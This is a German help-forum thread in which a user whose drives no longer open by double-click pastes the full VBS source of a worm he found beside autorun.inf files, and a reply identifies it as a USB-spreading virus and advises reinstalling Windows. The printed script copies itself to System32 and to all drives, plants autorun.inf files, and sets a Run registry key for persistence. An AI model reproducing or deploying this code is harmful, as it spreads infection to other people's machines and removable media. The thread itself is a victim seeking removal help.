Autorun.inf und vbs-datei Hilfe

Internet Internet Sicherheit
1

Hallo,

ich habe folgendes Problem: Ich kann auf dem Arbeitsplatz die Laufwerke nur noch mit einem Rechtsklick öffnen --> Doppelklick funktioniert nicht mehr!
Ich habe festgestellt das auf den Partionen jeweils eine autorun.inf und eine vbs-Datei mit dem Computernamen als Namen ist.
Ich habe diese Dateien mehrmals gelöscht, aber sie kommen immer wieder.

hiermal der Text der vbs datei die autorun.inf ruft das script auf

'Mutation of Trojan virus.
'My name is JAYKEYPC.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Set fs = createobject(„Scripting.FileSystemObject“)
Set wn = WScript.CreateObject(„WScript.Network“)
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = wn.ComputerName & „.vbs“
rgname = Replace(newname,".vbs","")
atr = „[autorun]“&vbcrlf&„shellexecute=wscript.exe JAYKEYPC.vbs“
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & „\SYSTEM32“ & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & „\SYSTEM32“ & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & „\SYSTEM32“ & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path „A:“ Then
Set tf=fs.getfile(flashdrive.path &"\JAYKEYPC.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\JAYKEYPC.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\JAYKEYPC.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End If
next
Set rg = createobject(„WScript.Shell“)
rg.regwrite „HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run“ & rgname & „“,winpath&"\SYSTEM32" & newname
rg.regwrite „HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title“,„Hacked by " & Replace(oldname, „.vbs“,“")
if check 1 then
Wscript.sleep 120000
End if
loop while check1
Set sd = createobject(„Wscript.shell“)
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Für eure Hilfe bin ich sehr dankbar.

JayKey

2

Ich glaube der hats scho gesagt oder?
Is wirklich nen virus der versucht sich auf jeden USB-Stick zu kopieren.
Sprich, wenn dein Virenscanner nicht die autorun.bin gekillt hat (beim ersten mal schon, was ichned glaube weildu sagst das ist bei jedem USB-Stick so) dann hilft nur das übliche prozedere um einen virus wieder los zu werden: Windows-Platte formatieren und neu aufsetzen, sorry.

'Mutation of Trojan virus.
'My name is JAYKEYPC.vbs